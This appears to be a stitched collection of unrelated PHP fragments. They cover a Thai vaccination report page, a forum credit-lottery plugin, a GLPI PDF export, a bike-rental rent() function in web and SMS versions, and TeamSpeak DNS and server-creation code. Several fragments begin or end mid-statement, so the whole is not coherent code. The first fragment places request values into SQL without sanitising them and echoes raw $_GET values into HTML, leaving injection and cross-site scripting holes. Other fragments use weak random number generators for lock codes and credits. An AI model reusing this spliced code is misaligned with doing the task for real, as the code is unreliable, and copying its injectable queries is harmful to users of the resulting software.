} elseif ($chk_ultra == "4") { $chksto = "and tmp.vitalcheck is null"; } else { $chksto = ""; } $str = retDate($_GET[str]); $sto = retDate($_GET[sto]); $ovyear = substr($sto, 0, 4); $sql = "SELECT\nperson.pcucodeperson,\nperson.pid,\nperson.idcard,\nCONVERT(concat(ifnull(ctitle.titlename,ifnull(person.prename,'ไม่ระบุ') ),person.fname,' ' ,person.lname) using utf8) as pname,\nctitle.titlename,\nperson.fname,\nperson.lname,\nperson.birth,\ngetageyearnum(person.birth,'{$str}') AS age,\nhouse.hno,\nhouse.villcode,\nhouse.xgis,\nhouse.ygis,\nhouse.usernamedoc,\nvisitepi.vaccinecode,\nvisitepi.dateepi\nFROM\nvillage\nINNER JOIN house ON village.pcucode = house.pcucode AND village.villcode = house.villcode\nINNER JOIN person ON house.pcucode = person.pcucodeperson AND house.hcode = person.hcode\nINNER JOIN visitepi ON person.pcucodeperson = visitepi.pcucodeperson AND person.pid = visitepi.pid\nINNER JOIN ctitle ON person.prename = ctitle.titlecode\nWHERE visitepi.vaccinecode in ('dT1','dTs1') and visitepi.dateepi between '{$str}' and '{$sto}' {$wvill}\nORDER BY house.villcode asc ,house.hno*1 asc,getageyearnum(person.birth,'{$str}') desc\n"; $result = mysql_query($sql); $txt = '<p align=\'center\'><b>รายชื่อผู้รับบริการฉีดวัคซีน dT1 และ dTs1 '; $txt .= "<br>ข้อมูลระหว่างวันที่ {$_GET['str']} ถึง {$_GET['sto']} {$mu} </b></p><b>{$hosp}</b><table width='99%' border='0' cellspacing='1' cellpadding='1' class='tbhl'>\n <tr>\n <th width='4%' scope='col'>ลำดับ</th>\n\t<th width='5%' scope='col'>HN</th>\n\t<th width='10%' scope='col'>เลขบัตรประชาชน</th>\n <th width='10%' scope='col'>ชื่อ - สกุล</th>\n\t<th width='5%' scope='col'>อายุ</th>\n <th width='6%' scope='col'>บ้านเลขที่</th>\n <th width='4%' scope='col'>หมู่ที่</th>\n <th width='8%' scope='col'>วันที่ฉีดวัคซีน</th>\n\t<th width='13%' scope='col'>ชนิดวัคซีน</th>\n\t<th width='12%' scope='col'>นสค.</th>\n </tr>"; while ($row = mysql_fetch_array($result)) { $moo = substr($row[villcode], 6, 2); $vill = 
getMooVillage($row[villcode]); $nsk = getusername($row[usernamedoc]); if ($row[dateepi] == "") { $sick = ""; } else { $sick = retDatets($row[dateepi]); } ++$i; if ($i % 2 == 1) { $cr = " class='altrow'"; } else { $cr = ""; } $txt .= " <tr {$cr}>\n <td><div align='center'>{$i}</div></td>\n\t<td><div align='center'>{$row['pid']}</div></td>\n\t<td><div align='center'>{$row['idcard']}</div></td>\n <td>{$row['pname']}</td>\n\t<td><div align='center'>{$row['age']}</div></td>\n <td><div align='center'>{$row['hno']}</div></td>\n <td><div align='center'>{$moo}</div></td>\n <td><div align='center'>{$sick}</div></td>\n\t<td><div align='center'>{$row['vaccinecode']}</div></td>\n\t<td>{$nsk}</td>\n </tr>"; } $txt .= "</table><br>"; echo $txt;
// Check whether the user has already taken part in today's draw: stop when
// today's date is not later than the date of the last recorded draw.
if (dgmdate($_G['timestamp'], 'Ymd', $_G['setting']['timeoffset']) <= dgmdate($zzza_lasttime_dateline, 'Ymd', $_G['setting']['timeoffset'])) {
    exit('Access Denied');
}
// Has the credit for this draw already been initialised?
// NOTE(review): $_G['uid'] is concatenated into the SQL text; presumably an
// integer supplied by the framework — confirm, or cast it before use.
$initialization_mark = DB::result_first("SELECT value FROM " . DB::table('yinxingfei_zzza_mark') . " WHERE uid = '" . $_G['uid'] . "'");
$initialization_mark = empty($initialization_mark) ? 0 : $initialization_mark;
// 0: not initialised
// 1: already initialised
if ($initialization_mark == 0) {
    // Read the three range percentages and let get_rand() choose one of them.
    $range1percentage = DB::result_first("SELECT percentage FROM " . DB::table('yinxingfei_zzza_range') . " WHERE id = '1'");
    $range2percentage = DB::result_first("SELECT percentage FROM " . DB::table('yinxingfei_zzza_range') . " WHERE id = '2'");
    $range3percentage = DB::result_first("SELECT percentage FROM " . DB::table('yinxingfei_zzza_range') . " WHERE id = '3'");
    $rangeid = get_rand(array($range1percentage, $range2percentage, $range3percentage));
    // The chosen index is shifted by one to match the range row ids used above.
    $rangeid = $rangeid + 1;
    $rangeab = DB::fetch_first("SELECT min,max FROM " . DB::table('yinxingfei_zzza_range') . " WHERE id = '" . $rangeid . "'");
    // NOTE(review): mt_rand() is not a cryptographic generator; if the credit
    // has real value, a CSPRNG such as random_int() is the safer source.
    $initialization_extcredit = mt_rand($rangeab['min'], $rangeab['max']);
    $today_extcredit = $initialization_extcredit;
    $zzzadata['uid'] = $_G['uid'];
    $zzzadata['username'] = getusername($_G['uid']);
    $zzzadata['today_extcredit'] = $initialization_extcredit;
    DB::insert('yinxingfei_zzza_rank', $zzzadata, false, true); // insert or update the row
    // To stop a user from farming credits by refreshing in several browsers,
    // the initialisation record is authoritative: however often the page is
    // reloaded, the initialised value is the one used.
    // NOTE(review): the mark is read above and written here in separate
    // statements; two concurrent requests could both observe 0 — confirm the
    // table constraints make the second write harmless.
    $newmark = array('uid' => $_G['uid'], 'value' => 1);
    DB::insert('yinxingfei_zzza_mark', $newmark, false, true);
} else {
    // Already initialised: reuse the value held in $zzzadata, which is
    // expected to have been populated before this point (not visible here).
    $today_extcredit = $zzzadata['today_extcredit'];
}
// The response body is the credit as a zero-padded number of at least 3 digits.
$today_extcredit = sprintf("%03d", $today_extcredit);
exit($today_extcredit);
/**
 * Write this resource's summary into a PDF.
 *
 * Prints a title line (id, plus request date and requester when a declaration
 * date is set), then name, location, contract type, manager, department,
 * arrival/departure dates and the description.
 *
 * NOTE(review): name, first name and description are handed to the PDF
 * writer unmodified inside HTML-style markup, while the manager and dropdown
 * values pass through Html::clean() first — confirm the difference is intended.
 *
 * @param object $pdf PDF output object
 */
function show_PDF($pdf)
{
    $fields = $this->fields;
    $labelled = '<b><i>%s :</i></b> %s';

    $pdf->setColumnsSize(50, 50);

    $title = '<b>' . __('ID') . ' ' . $fields['id'] . '</b>';
    $request = '';
    if (isset($fields["date_declaration"])) {
        $recipient = new User();
        $recipient->getFromDB($fields["users_id_recipient"]);
        $request = __('Request date') . ' : ' . Html::convDateTime($fields["date_declaration"])
            . ' ' . __('Requester') . ' ' . $recipient->getName();
    }
    $pdf->displayTitle($title, $request);

    $pdf->displayLine(
        sprintf($labelled, __('Name'), $fields['name']),
        sprintf($labelled, __('First name'), $fields['firstname'])
    );

    $pdf->displayLine(
        sprintf(
            $labelled,
            __('Location'),
            Html::clean(Dropdown::getDropdownName('glpi_locations', $fields['locations_id']))
        ),
        sprintf(
            $labelled,
            PluginResourcesContractType::getTypeName(1),
            Html::clean(Dropdown::getDropdownName(
                'glpi_plugin_resources_contracttypes',
                $fields['plugin_resources_contracttypes_id']
            ))
        )
    );

    $pdf->displayLine(
        sprintf($labelled, __('Resource manager', 'resources'), Html::clean(getusername($fields["users_id"]))),
        sprintf(
            $labelled,
            PluginResourcesDepartment::getTypeName(1),
            Html::clean(Dropdown::getDropdownName(
                'glpi_plugin_resources_departments',
                $fields["plugin_resources_departments_id"]
            ))
        )
    );

    $pdf->displayLine(
        sprintf($labelled, __('Arrival date', 'resources'), Html::convDate($fields["date_begin"])),
        sprintf($labelled, __('Departure date', 'resources'), Html::convDate($fields["date_end"]))
    );

    // The description spans the full width.
    $pdf->setColumnsSize(100);
    $pdf->displayText('<b><i>' . __('Description') . ' :</i></b>', $fields['comment']);
    $pdf->displaySpace();
}
?> <div class="pull-right action-buttons"> <a id="<?php echo $comment['comment_id']; ?> " class="editcomment"><span class="glyphicon glyphicon-pencil"></span></a> <a id="<?php echo $comment['comment_id']; ?> " class="deletecomment"><span class="glyphicon glyphicon-trash"></span></a> </div> <?php } ?> <span class="date sub-text"><?php echo $comment['created_date'] . ' By ' . getusername($comment['user_id']); ?> </span> </div> </li> <?php } ?> </ul> <div class="form-inline" role="form"> <div class="form-group"> <input class="form-control" id ="txtnewcomment-<?php echo $task['item_id']; ?>
<?php include "../includes/config.local.php"; $project = "GIS for JHCIS"; $usergis = $_SESSION[username]; $cuser = getusername($_SESSION[username]); $cfuser = getuserfname($_SESSION[username]); $clevel = $_SESSION[level]; $cposition = $_SESSION[position]; $titleweb = "GIS for JHCIS v3.0.0"; // if ($_SESSION[username]) { $headweb2 = $cuser; $lmenu = "menutop" . $clevel . ".php"; } else { $lmenu = "menutop2.php"; $headweb2 = "บุคคลทั่วไป"; } $sqloff = "SELECT chospital.hosname,chospital.hoscode \n\t\t\t\tFROM office\n\t\t\t\tInner Join chospital ON office.offid = chospital.hoscode\n\t\t\t\tWHERE chospital.hoscode <> '0000x'"; $resoff = mysql_query($sqloff); $rowoff = mysql_fetch_array($resoff); $hospitalname = $rowoff[hosname]; $hospitalcode = $rowoff[hoscode]; $offname = "" . $rowoff[hosname] . "(" . $rowoff[hoscode] . ")"; $version = "version v3.0.0 beta"; $headweb = "<table width='100%' border='0' cellspacing='0' cellpadding='0'><tr><td><img src='images/logo.jpg'></td><td></td><td><div align='right'><strong>{$offname}</strong><br>{$version}</div></td></tr></table>"; $todays = date("Y-m-d"); $dtimenow = date("Y-m-d H:i:s"); $ThaiMonth = array("มกราคม", "กุมภาพันธ์", "มีนาคม", "เมษายน", "พฤษภาคม", "มิถุนายน", "กรกฎาคม", "สิงหาคม", "กันยายน", "ตุลาคม", "พฤศจิกายน", "ธันวาคม"); $ThaiSubMonth = array("ม.ค.", "ก.พ.", "มี.ค.", "เม.ย.", "พ.ค.", "มิ.ย.", "ก.ค.", "ส.ค.", "ก.ย.", "ต.ค.", "พ.ย.", "ธ.ค."); /*ฟังก์ชั่นตัดสตริงแปลงวันที่เป็นไทยแบบสั้น ตัวอย่างรูปแบบสตริงนำเข้า 2001-07-16 23:53:11*/ function SortThaiDate($txt)
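/**
 * Rent a bike to a user from the web interface.
 *
 * Checks the user's credit and rental limit, optionally enforces the
 * "top of stack" rule, then assigns the bike to the user, rotates the lock
 * code and records a RENT entry in the history table. All user feedback
 * goes through response().
 *
 * @param int|string $userId id of the renting user; cast to int before use
 * @param int|string $bike   bike number as received from the request; cast to int
 * @param bool       $force  accepted for signature compatibility; not read here
 *
 * @return void
 */
function rent($userId, $bike, $force = FALSE)
{
    global $db, $forcestack, $watches, $credit;

    $stacktopbike = FALSE;

    // Both values are interpolated into SQL and echoed into the HTML reply
    // below. Forcing them to integers closes the injection path in both
    // contexts and matches the intval() the SMS variant of rent() applies.
    $userId = intval($userId);
    $bikeNum = intval($bike);

    $requiredcredit = $credit["min"] + $credit["rent"] + $credit["longrental"];
    $creditcheck = checkrequiredcredit($userId);
    if ($creditcheck === FALSE) {
        response(_('You are below required credit') . " " . $requiredcredit . $credit["currency"] . ". " . _('Please, recharge your credit.'), ERROR);
        // Explicit return so the rental cannot proceed if response() ever
        // comes back to the caller.
        return;
    }

    checktoomany(0, $userId);

    $result = $db->query("SELECT count(*) as countRented FROM bikes where currentUser={$userId}");
    $row = $result->fetch_assoc();
    $countRented = $row["countRented"];

    $result = $db->query("SELECT userLimit FROM limits where userId={$userId}");
    $row = $result->fetch_assoc();
    $limit = $row["userLimit"];

    if ($countRented >= $limit) {
        if ($limit == 0) {
            response(_('You can not rent any bikes. Contact the admins to lift the ban.'), ERROR);
        } elseif ($limit == 1) {
            response(_('You can only rent') . " " . sprintf(ngettext('%d bike', '%d bikes', $limit), $limit) . " " . _('at once') . ".", ERROR);
        } else {
            response(_('You can only rent') . " " . sprintf(ngettext('%d bike', '%d bikes', $limit), $limit) . " " . _('at once and you have already rented') . " " . $limit . ".", ERROR);
        }
        return;
    }

    if ($forcestack or $watches["stack"]) {
        $result = $db->query("SELECT currentStand FROM bikes WHERE bikeNum={$bikeNum}");
        $row = $result->fetch_assoc();
        $standid = $row["currentStand"];
        $stacktopbike = checktopofstack($standid);

        if ($watches["stack"] and $stacktopbike != $bikeNum) {
            // $standid comes from the bikes table, not from the request.
            $result = $db->query("SELECT standName FROM stands WHERE standId='{$standid}'");
            $row = $result->fetch_assoc();
            $stand = $row["standName"];
            $user = getusername($userId);
            notifyAdmins(_('Bike') . " " . $bikeNum . " " . _('rented out of stack by') . " " . $user . ". " . $stacktopbike . " " . _('was on the top of the stack at') . " " . $stand . ".", ERROR);
        }

        if ($forcestack and $stacktopbike != $bikeNum) {
            response(_('Bike') . " " . $bikeNum . " " . _('is not rentable now, you have to rent bike') . " " . $stacktopbike . " " . _('from this stand') . ".", ERROR);
            return;
        }
    }

    $result = $db->query("SELECT currentUser,currentCode FROM bikes WHERE bikeNum={$bikeNum}");
    // Without this guard an unknown bike number fell through with an empty
    // row: a code was shown and a RENT history entry written for a bike that
    // does not exist.
    if (!$result or $result->num_rows != 1) {
        response(_('Bike') . " " . $bikeNum . " " . _('does not exist') . ".", ERROR);
        return;
    }
    $row = $result->fetch_assoc();
    $currentCode = sprintf("%04d", $row["currentCode"]);
    $currentUser = $row["currentUser"];

    $result = $db->query("SELECT note FROM notes WHERE bikeNum={$bikeNum} ORDER BY time DESC");
    $note = "";
    while ($row = $result->fetch_assoc()) {
        $note .= $row["note"] . "; ";
    }
    $note = substr($note, 0, strlen($note) - 2); // remove the trailing "; "

    // Do not create a code with more than one leading zero or more than two
    // leading 9s (kind of unusual/unsafe).
    // NOTE(review): rand() is not a cryptographically secure generator, so
    // successive lock codes are more predictable than they need to be.
    // random_int(100, 9900) is the drop-in replacement on PHP 7+.
    $newCode = sprintf("%04d", rand(100, 9900));

    if ($currentUser == $userId) {
        response(_('You have already rented the bike') . ' ' . $bikeNum . '. ' . _('Code is') . ' <span class="label label-primary">' . $currentCode . '</span>. ' . _('Return bike by scanning QR code on a stand') . '.', ERROR);
        return;
    }
    if ($currentUser != 0) {
        response(_('Bike') . " " . $bikeNum . " " . _('is already rented') . ".", ERROR);
        return;
    }

    $message = '<h3>' . _('Bike') . ' ' . $bikeNum . ': <span class="label label-primary">' . _('Open with code') . ' ' . $currentCode . '.</span></h3>' . _('Change code immediately to') . ' <span class="label label-default">' . $newCode . '</span><br />' . _('(open, rotate metal part, set new code, rotate metal part back)') . '.';
    if ($note) {
        // Notes are free text read back from the database and placed inside
        // HTML, so encode them for that context before output.
        // NOTE(review): if notes are already HTML-encoded when stored this
        // double-encodes; confirm against the code that writes them.
        $message .= "<br />" . _('Reported issue:') . " <em>" . htmlspecialchars($note, ENT_QUOTES, 'UTF-8') . "</em>";
    }

    $result = $db->query("UPDATE bikes SET currentUser={$userId},currentCode={$newCode},currentStand=NULL WHERE bikeNum={$bikeNum}");
    $result = $db->query("INSERT INTO history SET userId={$userId},bikeNum={$bikeNum},action='RENT',parameter={$newCode}");
    response($message);
}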
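/**
 * Rent a bike to the user identified by a phone number (SMS interface).
 *
 * Unless $force is set, the user's credit, rental limit and the optional
 * "top of stack" rule are checked first. The bike is then assigned to the
 * user, the lock code is rotated and a RENT (or FORCERENT) history entry is
 * written. All replies to the requester are sent with sendSMS().
 *
 * @param string     $number phone number the request came from
 * @param int|string $bike   bike number taken from the message; cast to int
 * @param bool       $force  when true, skip the credit/limit/stack and
 *                           "already rented" checks and log FORCERENT
 *
 * @return void
 */
function rent($number, $bike, $force = FALSE)
{
    global $db, $forcestack, $watches, $credit;

    $stacktopbike = FALSE;
    $userId = getUser($number);
    // Only the integer form of the bike number is used below. The original
    // still interpolated the raw $bike into one query and into the admin
    // notification, which let message text reach SQL unfiltered.
    $bikeNum = intval($bike);
    $requiredcredit = $credit["min"] + $credit["rent"] + $credit["longrental"];

    if ($force == FALSE) {
        $creditcheck = checkrequiredcredit($userId);
        if ($creditcheck === FALSE) {
            $result = $db->query("SELECT credit FROM credit WHERE userId={$userId}");
            $row = $result->fetch_assoc();
            sendSMS($number, _('Please, recharge your credit:') . " " . $row["credit"] . $credit["currency"] . ". " . _('Credit required:') . " " . $requiredcredit . $credit["currency"] . ".");
            return;
        }

        checktoomany(0, $userId);

        $result = $db->query("SELECT count(*) as countRented FROM bikes where currentUser={$userId}");
        $row = $result->fetch_assoc();
        $countRented = $row["countRented"];

        $result = $db->query("SELECT userLimit FROM limits where userId={$userId}");
        $row = $result->fetch_assoc();
        $limit = $row["userLimit"];

        if ($countRented >= $limit) {
            if ($limit == 0) {
                sendSMS($number, _('You can not rent any bikes. Contact the admins to lift the ban.'));
            } elseif ($limit == 1) {
                sendSMS($number, _('You can only rent') . " " . sprintf(ngettext('%d bike', '%d bikes', $limit), $limit) . " " . _('at once') . ".");
            } else {
                sendSMS($number, _('You can only rent') . " " . sprintf(ngettext('%d bike', '%d bikes', $limit), $limit) . " " . _('at once') . " " . _('and you have already rented') . " " . $limit . ".");
            }
            return;
        }

        if ($forcestack or $watches["stack"]) {
            $result = $db->query("SELECT currentStand FROM bikes WHERE bikeNum={$bikeNum}");
            $row = $result->fetch_assoc();
            $standid = $row["currentStand"];
            $stacktopbike = checktopofstack($standid);

            if ($watches["stack"] and $stacktopbike != $bikeNum) {
                // $standid comes from the bikes table, not from the message.
                $result = $db->query("SELECT standName FROM stands WHERE standId='{$standid}'");
                $row = $result->fetch_assoc();
                $stand = $row["standName"];
                $user = getusername($userId);
                notifyAdmins(_('Bike') . " " . $bikeNum . " " . _('rented out of stack by') . " " . $user . ". " . $stacktopbike . " " . _('was on the top of the stack at') . " " . $stand . ".", ERROR);
            }

            if ($forcestack and $stacktopbike != $bikeNum) {
                // The original called response() here, presumably carried
                // over from the web handler; every other reply in this
                // function goes out by SMS, so this one does too.
                sendSMS($number, _('Bike') . " " . $bikeNum . " " . _('is not rentable now, you have to rent bike') . " " . $stacktopbike . " " . _('from this stand') . ".");
                return;
            }
        }
    }

    $result = $db->query("SELECT currentUser,currentCode FROM bikes WHERE bikeNum={$bikeNum}");
    if ($result->num_rows != 1) {
        sendSMS($number, "Bike {$bikeNum} does not exist.");
        return;
    }
    $row = $result->fetch_assoc();
    $currentCode = sprintf("%04d", $row["currentCode"]);
    $currentUser = $row["currentUser"];

    $result = $db->query("SELECT note FROM notes WHERE bikeNum={$bikeNum} AND deleted IS NULL ORDER BY time DESC LIMIT 1");
    $row = $result->fetch_assoc();
    $note = $row["note"];

    if ($currentUser) {
        // Needed only for the override notice sent at the end of a forced rent.
        $result = $db->query("SELECT number FROM users WHERE userId={$currentUser}");
        $row = $result->fetch_assoc();
        $currentUserNumber = $row["number"];
    }

    // Do not create a code with more than one leading zero or more than two
    // leading 9s (kind of unusual/unsafe).
    // NOTE(review): rand() is not a cryptographically secure generator, so
    // successive lock codes are more predictable than they need to be.
    // random_int(100, 9900) is the drop-in replacement on PHP 7+.
    $newCode = sprintf("%04d", rand(100, 9900));

    if ($force == FALSE) {
        if ($currentUser == $userId) {
            sendSMS($number, _('You have already rented the bike') . " " . $bikeNum . ". " . _('Code is') . " " . $currentCode . ". " . _('Return bike with command:') . " RETURN " . _('bikenumber') . " " . _('standname') . ".");
            return;
        }
        if ($currentUser != 0) {
            sendSMS($number, _('Bike') . " " . $bikeNum . " " . _('is already rented') . ".");
            return;
        }
    }

    $message = _('Bike') . " " . $bikeNum . ": " . _('Open with code') . " " . $currentCode . ". " . _('Change code immediately to') . " " . $newCode . " " . _('(open,rotate metal part,set new code,rotate metal part back)') . ".";
    if ($note) {
        $message .= "(" . _('bike note') . ":" . $note . ")";
    }
    // NOTE(review): the code is sent before the UPDATE below is known to
    // have succeeded; a failed write leaves the user holding a code for a
    // bike that is not recorded as theirs.
    sendSMS($number, $message);

    $result = $db->query("UPDATE bikes SET currentUser={$userId},currentCode={$newCode},currentStand=NULL WHERE bikeNum={$bikeNum}");
    if ($force == FALSE) {
        $result = $db->query("INSERT INTO history SET userId={$userId},bikeNum={$bikeNum},action='RENT',parameter={$newCode}");
    } else {
        $result = $db->query("INSERT INTO history SET userId={$userId},bikeNum={$bikeNum},action='FORCERENT',parameter={$newCode}");
        if ($currentUser) {
            sendSMS($currentUserNumber, _('System override') . ": " . _('Your rented bike') . " " . $bikeNum . " " . _('has been rented by admin') . ".");
        }
    }
}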
/**
 * Decide whether a hostname may be assigned to a voice server or DNS record.
 *
 * Returns false when the name is already present in `voice_dns` or
 * `voice_server` for the current reseller, and, when $user_id is given, when
 * it collides with one of the reseller's default-DNS labels or imitates the
 * generated default name of another id. Returns true otherwise.
 *
 * All queries are prepared statements bound to the global $reseller_id, so
 * lookups stay inside the current reseller's rows.
 *
 * @param string          $dns     hostname to check
 * @param int|string|null $id      id of the record being edited; excluded from
 *                                 the duplicate lookups for 'server' and 'dns'
 * @param int|string|null $user_id owner; enables the default-DNS checks when set
 * @param string          $type    'server', 'dns', or anything else for a plain
 *                                 duplicate check
 *
 * @return bool true when the name is acceptable, false otherwise
 */
function checkDNS($dns, $id = null, $user_id = null, $type = '')
{
    global $sql, $reseller_id;

    // Step 1: duplicate lookup. $query searches voice_dns, $query2 searches
    // voice_server; which rows are excluded depends on what is being edited.
    if ($type == 'server') {
        // Master server of the voice server being edited.
        $query = $sql->prepare("SELECT `masterserver` FROM `voice_server` WHERE `id`=? AND `resellerid`=? LIMIT 1");
        $query->execute(array($id, $reseller_id));
        $masterID = $query->fetchColumn();
        $query = $sql->prepare("SELECT `tsdnsID` FROM `voice_dns` WHERE `dns`=? AND `resellerID`=? LIMIT 1");
        $query->execute(array($dns, $reseller_id));
        // Any other voice server already using this name.
        $query2 = $sql->prepare("SELECT `masterserver` FROM `voice_server` WHERE `id`!=? AND `dns`=? AND `resellerid`=? LIMIT 1");
        $query2->execute(array($id, $dns, $reseller_id));
    } else {
        if ($type == 'dns') {
            // NOTE(review): this selects the tsdnsID of a record whose dnsID
            // is NOT $id, yet $masterID is later compared as if it belonged to
            // the record being edited. Looks like `dnsID`=? was intended — confirm.
            $query = $sql->prepare("SELECT `tsdnsID` FROM `voice_dns` WHERE `dnsID`!=? AND `resellerID`=? LIMIT 1");
            $query->execute(array($id, $reseller_id));
            $masterID = $query->fetchColumn();
            $query = $sql->prepare("SELECT `tsdnsID` FROM `voice_dns` WHERE `dnsID`!=? AND `dns`=? AND `resellerID`=? LIMIT 1");
            $query->execute(array($id, $dns, $reseller_id));
            $query2 = $sql->prepare("SELECT `id` FROM `voice_server` WHERE `dns`=? AND `resellerid`=? LIMIT 1");
            $query2->execute(array($dns, $reseller_id));
        } else {
            // No record to exclude: any existing use of the name counts.
            $query = $sql->prepare("SELECT `tsdnsID` FROM `voice_dns` WHERE `dns`=? AND `resellerID`=? LIMIT 1");
            $query->execute(array($dns, $reseller_id));
            $query2 = $sql->prepare("SELECT `id` FROM `voice_server` WHERE `dns`=? AND `resellerid`=? LIMIT 1");
            $query2->execute(array($dns, $reseller_id));
        }
    }
    // NOTE(review): rowCount() on a SELECT is driver-dependent in PDO;
    // verify it is reliable for the driver in use.
    if ($query->rowCount() > 0 or $query2->rowCount() > 0) {
        return false;
    }

    // Step 2: only when an owner is known, compare against default-DNS names.
    if ($user_id != null) {
        $serverdnsArray = array();
        $query = $sql->prepare("SELECT `id`,`defaultdns`,`externalDefaultDNS`,`tsdnsServerID` FROM `voice_masterserver` WHERE `resellerid`=?");
        $query->execute(array($reseller_id));
        while ($row = $query->fetch(PDO::FETCH_ASSOC)) {
            if ($row['externalDefaultDNS'] == 'N') {
                unset($temp);
                if ($type == 'server' and $id != null and $row['id'] == $masterID) {
                    // Generated default name for this server: "<id>.<defaultdns>".
                    $defaultdns = strtolower($id . '.' . $row['defaultdns']);
                    $partCount = count(explode('.', $defaultdns));
                }
                $ex = explode('.', $row['defaultdns']);
                $i = count($ex) - 1;
                // NOTE(review): $temp is unset above and never assigned in this
                // function, so isset($temp) is always false and only the single
                // labels of defaultdns are collected, never the cumulative
                // suffixes. An accumulator assignment appears to be missing — confirm.
                while ($i >= 0) {
                    $serverdnsArray[] = isset($temp) ? $ex[$i] . '.' . $temp : $ex[$i];
                    $i--;
                }
            } else {
                if ($type == 'server' and $row['externalDefaultDNS'] == 'Y' and $id != null and $row['id'] == $masterID) {
                    // The master delegates to an external TSDNS server; remember which.
                    $tsdnsServerID = $row['tsdnsServerID'];
                }
            }
        }
        $query = $sql->prepare("SELECT `id`,`defaultdns` FROM `voice_tsdns` WHERE `resellerid`=?");
        $query->execute(array($reseller_id));
        while ($row = $query->fetch(PDO::FETCH_ASSOC)) {
            unset($temp);
            // `and` binds tighter than `or`: (external TSDNS match) or (dns-type match).
            if (isset($tsdnsServerID) and $id != null and $row['id'] == $tsdnsServerID or $type == 'dns' and $id != null and $row['id'] == $masterID) {
                // Generated default name here: "<id>-<username>.<defaultdns>".
                $defaultdns = strtolower($id . '-' . getusername($user_id) . '.' . $row['defaultdns']);
                $partCount = count(explode('.', $defaultdns));
            }
            $ex = explode('.', $row['defaultdns']);
            $i = count($ex) - 1;
            // Same label collection as above; the $temp note applies here too.
            while ($i >= 0) {
                $serverdnsArray[] = isset($temp) ? $ex[$i] . '.' . $temp : $ex[$i];
                $i--;
            }
        }
        // The record's own generated default name is always allowed.
        if (isset($defaultdns) and $dns == $defaultdns) {
            return true;
        }
        $ex = explode('.', $dns);
        $dnsPartCount = count($ex);
        $first = $ex[0];
        // Same label count as the default name and a first label that passes
        // isid(): reject for 'dns', and for 'server' when that label is not
        // this record's own id.
        if (isset($partCount) and $partCount == $dnsPartCount and isid($first, 10) and ($type == 'dns' or $type == 'server' and $first != $id)) {
            return false;
        }
        // For 'dns' the first label has the form "<id>-<username>"; reject a
        // name whose id part differs from this record's id.
        $ex = explode('-', $first);
        if ($type == 'dns' and isset($partCount) and $partCount == $dnsPartCount and $ex[0] != $id) {
            return false;
        }
        $serverdnsArray = array_unique($serverdnsArray);
        // Reject a name equal to one of the collected default-DNS labels.
        // in_array() is called without strict comparison, so numeric-looking
        // strings are compared loosely.
        if ((isset($defaultdns) and $dns != $defaultdns or !isset($defaultdns)) and in_array($dns, $serverdnsArray)) {
            return false;
        }
    }
    return true;
}
} // No need to check if we can connect if the user messed up the input fields anyway if (count($errors) == 0) { $connection = new TS3($masterServerData['ssh2ip'], $masterServerData['queryport'], 'serveradmin', $masterServerData['decryptedquerypassword']); $errorcode = $connection->errorcode; if (strpos($errorcode, 'error id=0') === false) { $errors['ts3Connect'] = $errorcode; } } // Submitted values are OK if (count($errors) == 0) { // Make the inserts or updates define the log entry and get the affected rows from insert if ($ui->st('action', 'post') == 'ad') { $localServerID = $connection->AddServer($slots, $ip, $port, $initialpassword, $name, array($forcewelcome, $welcome), $max_download_total_bandwidth, $max_upload_total_bandwidth, array($forcebanner, $hostbanner_url), $hostbanner_gfx_url, array($forcebutton, $hostbutton_url), $hostbutton_gfx_url, $hostbutton_tooltip); if (isid($localServerID, 255)) { $username = strtolower(getusername($userID)); $query = $sql->prepare("INSERT INTO `voice_server` (`active`,`backup`,`lendserver`,`userid`,`masterserver`,`ip`,`port`,`slots`,`initialpassword`,`password`,`forcebanner`,`forcebutton`,`forceservertag`,`forcewelcome`,`max_download_total_bandwidth`,`max_upload_total_bandwidth`,`localserverid`,`dns`,`maxtraffic`,`serverCreated`,`flexSlots`,`flexSlotsFree`,`flexSlotsPercent`,`autoRestart`,`externalID`,`resellerid`) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,NOW(),?,?,?,?,?,?)"); $query->execute(array($active, $backup, $lendserver, $userID, $rootID, $ip, $port, $slots, $initialpassword, $password, $forcebanner, $forcebutton, $forceservertag, $forcewelcome, $max_download_total_bandwidth, $max_upload_total_bandwidth, $localServerID, $dns, $maxtraffic, $flexSlots, $flexSlotsFree, $flexSlotsPercent, $autoRestart, $externalID, $resellerLockupID)); $rowCount = $query->rowCount(); $id = $sql->lastInsertId(); } else { $ts3ErrorCode = 'TS errorcode: ' . $localServerID; } $loguseraction = '%add% %voserver% ' . $ip . ':' . 
$port; } else { if ($ui->st('action', 'post') == 'md' and $id) { $query = $sql->prepare("UPDATE `voice_server` SET `active`=?,`backup`=?,`lendserver`=?,`ip`=?,`port`=?,`slots`=?,`password`=?,`forcebanner`=?,`forcebutton`=?,`forceservertag`=?,`forcewelcome`=?,`max_download_total_bandwidth`=?,`max_upload_total_bandwidth`=?,`dns`=?,`flexSlots`=?,`flexSlotsFree`=?,`flexSlotsPercent`=?,`maxtraffic`=?,`autoRestart`=?,`externalID`=? WHERE `id`=? AND `resellerid`=? LIMIT 1"); $query->execute(array($active, $backup, $lendserver, $ip, $port, $slots, $password, $forcebanner, $forcebutton, $forceservertag, $forcewelcome, $max_download_total_bandwidth, $max_upload_total_bandwidth, $dns, $flexSlots, $flexSlotsFree, $flexSlotsPercent, $maxtraffic, $autoRestart, $externalID, $id, $resellerLockupID)); $rowCount = $query->rowCount(); $return = $connection->ModServer($localServerID, $slots, $ip, $port, $initialpassword, $name, $welcome, $max_download_total_bandwidth, $max_upload_total_bandwidth, $hostbanner_url, $hostbanner_gfx_url, $hostbutton_url, $hostbutton_gfx_url, $hostbutton_tooltip); if (isset($return[0]['msg']) and $return[0]['msg'] == 'ok') {
